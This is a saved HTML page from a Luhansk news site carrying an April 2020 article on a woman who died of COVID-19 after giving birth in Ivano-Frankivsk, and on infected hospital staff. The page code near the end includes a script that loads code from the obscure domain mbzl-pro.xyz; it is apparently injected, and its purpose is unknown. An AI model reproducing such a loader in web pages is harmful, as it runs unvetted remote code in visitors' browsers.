            <div id="td-aj-search"></div>
        </div>
    </div>
            </div>
        </div>
    </div>

</div>
            </div>

            
    <div class="td-main-content-wrap td-container-wrap">

        <div class="td-container td-post-template-1 ">
            <div class="td-crumb-container"></div>
            <div class="td-pb-row">
                                        <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                

    <article id="post-208716" class="post-208716 post type-post status-publish format-standard category-obchestvo-2" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            
            <header class="td-post-title">
                <h1 class="entry-title">Смерть в роддоме украинки с коронавирусом: всплыли скандальные подробности о болезни врачей</h1>

                

                <div class="td-module-meta-info">
                                        <span class="td-post-date"><time class="entry-date updated td-module-date" >Апр 1, 2020</time></span>                                        <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-208716">3</span></div>                </div>

            </header>


        </div>

        

        <div class="td-post-content tagdiv-type">
            <div class="td-featured-image-rec">

                        </div>

            <div itemprop="articleBody">
<p> <span style="background-color: initial;">С инфицированной коронавирусом </span>женщиной, которая умерла после родов в больнице Ивано-Франковска<span style="background-color: initial;">, контактировали медики, у которых также обнаружили COVID-19.</span> </p>
<p> Об этом сообщает hromadske со ссылкой на слова <span style="background-color: initial;"></span><span style="background-color: initial;">директора департамента здравоохранения Ивано-Франковской ОГА Владимира Чемного.</span> </p>
<p> <span style="background-color: initial;">Он отметил, что 37-летняя женщина попала в больницу под наблюдение гинекологов еще за месяц до родов (по данным ВОЗ, инкубационный период коронавируса не превышает 14 дней).</span> </p>
</p>
<p> <script type="text/javascript">         </script> </p>
<p> <em>&#171;Женщина поступила с соматическим заболеванием, подозрением на гестоз (осложнения во время беременности &#8212; &#171;Апостроф&#187;). У нее были сопутствующие заболевания, однако буквально за один день до родов у нее появились проявления вирусной инфекции&#187;, </em>&#8212; рассказал Чемный. </p>
<p> <span style="background-color: initial;">Роженицу перевели в специальное отделение. Сама женщина рассказала врачу, что была в Польше, но в ноябре 2019 года.</span> </p>
<div class="advertinline">
<p><script type="text/javascript"></p>
<p>	</script>
</div>
<p> <em>&#171;К сожалению, ее состояние ухудшилось, нарастала дыхательная недостаточность и после рождения ребенка женщина умерла на второй день&#187;, </em>&#8212; сказал чиновник. </p>
<p> <span style="background-color: initial;">Он уточнил, что врачи не считают, что она заразилась в Польше, а установить, где заразилась, нет возможности.</span> </p>
<p> <em>&#171;До родов этой женщины у нас не было среди пациентов и среди врачей даже подозрения на коронавирусную инфекцию. Однако на данный момент у нас есть три работника с перинатального центра (врач и две акушерки), которые действительно сейчас имеют положительный результат на <span style="background-color: initial;">COVID-19</span></em><span style="background-color: initial;"><em>&#171;, </em>&#8212; рассказал Чемный.</span> </p>
<p> <span style="background-color: initial;"></span> </p>
<p> Однако руководитель Ивано-Франковского областного перинатального центра Юрий Павлушинский сообщил, что у 4 работников центра подтвердили заболевания COVID-19. </p>
<p> Чемный отметил, что врач и анестезиолог контактировали с женщиной. В то же время установить, заразили ли они женщину, или она их, или эти случаи не связаны, невозможно. </p>
<p> <span style="background-color: initial;">Представитель ОГА</span> утверждает, что умершую посещали родственники, однако сестра роженицы Оксана Стасевич отрицает это. </p>
<p> <em>&#171;Я с ней говорила по телефону 19, 20 или 21, я не могу точно сказать дату, она позвонила и сказала, что она сидит в коридоре роддома, потому что в палате, где четыре женщины, у двоих была температура и стерилизуют палату. Тех женщин двух забрали. После них стерилизовали комнату&#187;, </em>&#8212; рассказала журналистам сестра умершей. </p>
<p> <span style="background-color: initial;">По словам Чемного, ни у какой из четырех женщин, которые были в палате с умершей, экспресс-тест коронавирус не обнаружил, но они продолжают находиться под наблюдением врачей. В то же время у самой роженицы также экспресс-тест коронавирус не подтвердил. Его обнаружил только ПЦР-тест.</span> </p>
<p> Стасевич добавила, что 30 марта ей позвонили врачи и рассказали, что сестра в тяжелом состоянии. Оксана с братом поехали в больницу, они застали ее еще живой. </p>
<p> <em> &#171;Врачи были без одежды, без ничего, никто нам не сказал, что у нее такая страшная болезнь того времени. Вплоть уже когда мы приехали за телом, они сказали, что у нее взяли анализы на коронавирус&#187;,</em> &#8212; сказала сестра. </p>
<p> Родственники уже купили гроб и планировали забрать тело, но им не разрешили, потому что анализ подтвердил коронавирус. </p>
<p> Как сообщал &#171;Апостроф&#187;, р<span style="background-color: initial;">одственники </span>женщины из Ивано-Франковска, которая заразившись коронавирусом<span style="background-color: initial;">, родила ребенка, а затем умерла, считают, что она подхватила опасную болезнь в роддоме.</span> </p>
</p></div>
<div class="td-a-rec td-a-rec-id-content_bottom  tdi_4_854 td_block_template_5">
<style>
/* custom css */
.tdi_4_854.td-a-rec-img{
				    text-align: left;
				}.tdi_4_854.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }
</style><!-- Composite Start --> 
 <div id="M553298ScriptRootC845725"> 
 </div> 
 <script src="https://jsc.mgid.com/l/u/lugradar.net.845725.js" async> 
 </script> 
 <!-- Composite End --> 
<script id="-Qb5mFiYJrpATOrq">if (window.relap) window.relap.ar('-Qb5mFiYJrpATOrq');</script>

 </div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

                                    <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="http://lugradar.net/author/vika">vika</a></span></div>	        <span class="td-page-meta" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="vika"></span><meta itemprop="datePublished" content="2020-04-01T22:57:27+03:00"><meta itemprop="dateModified" content="2020-04-01T22:57:27+03:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://lugradar.net/2020/04/208716"/><span class="td-page-meta" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://lugradar.net/wp-content/uploads/2020/03/3.png"></span><meta itemprop="name" content="Луганский радар"></span><meta itemprop="headline " content="Смерть в роддоме украинки с коронавирусом: всплыли скандальные подробности о болезни врачей"><span class="td-page-meta" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://lugradar.net/wp-content/themes/Newspaper/images/no-thumb/td_meta_replacement.png"><meta itemprop="width" content="1068"><meta itemprop="height" content="580"></span>        </footer>

    </article> <!-- /.post -->

    
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <style>.rpwe-block ul{
list-style: none !important;
margin-left: 0 !important;
padding-left: 0 !important;
}

.rpwe-block li{
border-bottom: 1px solid #eee;
margin-bottom: 10px;
padding-bottom: 10px;
list-style-type: none;
}

.rpwe-block a{
display: inline !important;
text-decoration: none;
}

.rpwe-block h3{
background: none !important;
clear: none;
margin-bottom: 0 !important;
margin-top: 0 !important;
font-weight: 400;
font-size: 12px !important;
line-height: 1.5em;
}

.rpwe-thumb{
border: 1px solid #eee !important;
box-shadow: none !important;
margin: 2px 10px 2px 0;
padding: 3px !important;
}

.rpwe-summary{
font-size: 12px;
}

.rpwe-time{
color: #bbb;
font-size: 11px;
}

.rpwe-alignleft{
display: inline;
float: left;
}

.rpwe-alignright{
display: inline;
float: right;
}

.rpwe-aligncenter{
display: block;
margin-left: auto;
margin-right: auto;
}

.rpwe-clearfix:before,
.rpwe-clearfix:after{
content: "";
display: table !important;
}

.rpwe-clearfix:after{
clear: both;
}

.rpwe-clearfix{
zoom: 1;
}
</style><aside id="rpwe_widget-5" class="td_block_template_5 widget rpwe_widget-5 rpwe_widget recent-posts-extended"><h4 class="td-block-title"><span>Лента новостей</span></h4><div  class="rpwe-block "><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T18:02:14+03:00">18:02</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208682" title="На улицах неподконтрольного Луганска многолюдно, мало кто носит маски. ФОТО" rel="bookmark">На улицах неподконтрольного Луганска многолюдно, мало кто носит маски. ФОТО</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T17:54:01+03:00">17:54</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208679" title="В Старобельске поделились планами по ремонту дорог коммунальной собственности" rel="bookmark">В Старобельске поделились планами по ремонту дорог коммунальной собственности</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T17:44:54+03:00">17:44</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208676" title="В Сватово пьяный водитель сбил мужчину, который выходил из кабины трактора, и скрылся с места ДТП" rel="bookmark">В Сватово пьяный водитель сбил мужчину, который выходил из кабины трактора, и скрылся с места ДТП</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T17:34:55+03:00">17:34</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208673" title="В Старобельском районе 1 апреля завершается отопительный сезон" rel="bookmark">В Старобельском районе 1 апреля завершается отопительный сезон</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T17:26:52+03:00">17:26</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208669" title="В Северодонецке начали дезинфекцию подъездов жилых домов" rel="bookmark">В Северодонецке начали дезинфекцию подъездов жилых домов</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T16:30:23+03:00">16:30</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208652" title="Гайдай: Сейчас в Луганской области 1800  ПЦР-тестов, ожидается поставка еще нескольких тысяч" rel="bookmark">Гайдай: Сейчас в Луганской области 1800  ПЦР-тестов, ожидается поставка еще нескольких тысяч</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T15:22:21+03:00">15:22</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208639" title="Должностных лиц &#171;Лисичанскугля&#187; будут судить за присвоение 200 тысяч гривен бюджетных средств" rel="bookmark">Должностных лиц &#171;Лисичанскугля&#187; будут судить за присвоение 200 тысяч гривен бюджетных средств</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T15:04:54+03:00">15:04</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208633" title="Стало известно имя бойца, который погиб вчера на Донбассе" rel="bookmark">Стало известно имя бойца, который погиб вчера на Донбассе</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T14:38:55+03:00">14:38</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208628" title="В ОРЛО ввели ряд новых ограничений из-за коронавируса" rel="bookmark">В ОРЛО ввели ряд новых ограничений из-за коронавируса</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-04-01T14:16:35+03:00">14:16</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/04/208621" title="Третий случай заболевания на коронавирус в Луганской области: 41 человека отправили на карантин или самоизоляцию" rel="bookmark">Третий случай заболевания на коронавирус в Луганской области: 41 человека отправили на карантин или самоизоляцию</a></h3></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></aside><aside id="text-4" class="td_block_template_5 widget text-4 widget_text">			<div class="textwidget"><!-- Yandex.Metrika counter -->
<script type="text/javascript">
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter22625773 = new Ya.Metrika({
                    id:22625773,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true,
                    webvisor:true,
                    trackHash:true
                });
            } catch(e) { }
        });

        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = "https://mc.yandex.ru/metrika/watch.js";

        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/22625773" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
</div>
		</aside>                            </div>
                        </div>
                                    </div> <!-- /.td-pb-row -->
        </div> <!-- /.td-container -->
    </div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->

	
	
            <div class="tdc-footer-wrap ">

                <!-- Footer -->
				
                <!-- Sub Footer -->
				    <div class="td-sub-footer-container td-container-wrap ">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span td-sub-footer-menu">
                                    </div>

                <div class="td-pb-span td-sub-footer-copy">
                    &copy; 2013 - 2020 Луганский Радар. Все права защищены.                </div>
            </div>
        </div>
    </div>
            </div><!--close td-footer-wrap-->
			
</div><!--close td-outer-wrap-->




    <!--

        Theme: Newspaper by tagDiv.com 2019
        Version: 10.3.1 (rara)
        Deploy mode: deploy
        
        uid: 5e8504f940190
    -->

    
<!-- Custom css from theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.rpwe-block li { 
margin-bottom: 6px; 
padding-left: 40px; 
margin-left: 0; 
padding-bottom: 6px; 
position: relative; 
border-bottom: 1px solid #eee; 
} 

.rpwe-time { 
padding: 2px 10px 0 0; 
line-height: 1.5em; 
position: absolute; 
left: 0; 
} 

.rpwe-block h3 { 
font-size: 15px!important; 
}
</style>

<div class="td-container"><script type="text/javascript" async src="https://relap.io/api/v6/head.js?token=Bn4Gf_t_v9MuMRAV"></script>
<script type="text/javascript">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</script>
 <!-- 1727fe3d9b1387f9 -->
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43561524-1', 'auto');
  ga('send', 'pageview');

</script>
<?php echo do_shortcode("[COVID19]"); ?>
</div><script type='text/javascript' src='http://lugradar.net/wp-includes/js/underscore.min.js?ver=1.8.3'></script>
<script type='text/javascript' src='http://lugradar.net/wp-content/plugins/td-cloud-library/assets/js/js_posts_autoload.min.js?ver=8a1d9913b13d9ab2baf63a2b29cd9fc1'></script>
<script type='text/javascript' src='http://lugradar.net/wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=10.3.1'></script>
<script type='text/javascript' src='http://lugradar.net/wp-includes/js/comment-reply.min.js?ver=2e2302cf56c0f42f1e414c5294cfde3c'></script>
<script type='text/javascript' src='http://lugradar.net/wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=8a1d9913b13d9ab2baf63a2b29cd9fc1'></script>
<script type='text/javascript' src='http://lugradar.net/wp-includes/js/wp-embed.min.js?ver=2e2302cf56c0f42f1e414c5294cfde3c'></script>
<script type="text/javascript">
    (function(w,d){var script = d.createElement('script');script.src = '//mbzl-pro.xyz/get_code?w=2890'+'&r='+Math.random()*10000000000;;d.body.appendChild(script);})(window, document);
</script>
<!-- JS generated by theme -->

<script>
    

                jQuery().ready(function jQuery_ready() {
                    tdAjaxCount.tdGetViewsCountsAjax("post","[208716]");
                });
            
</script>


</body>
</html>
<!-- Dynamic page generated in 1.581 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2020-04-02 00:17:45 -->

<!-- Compression = gzip -->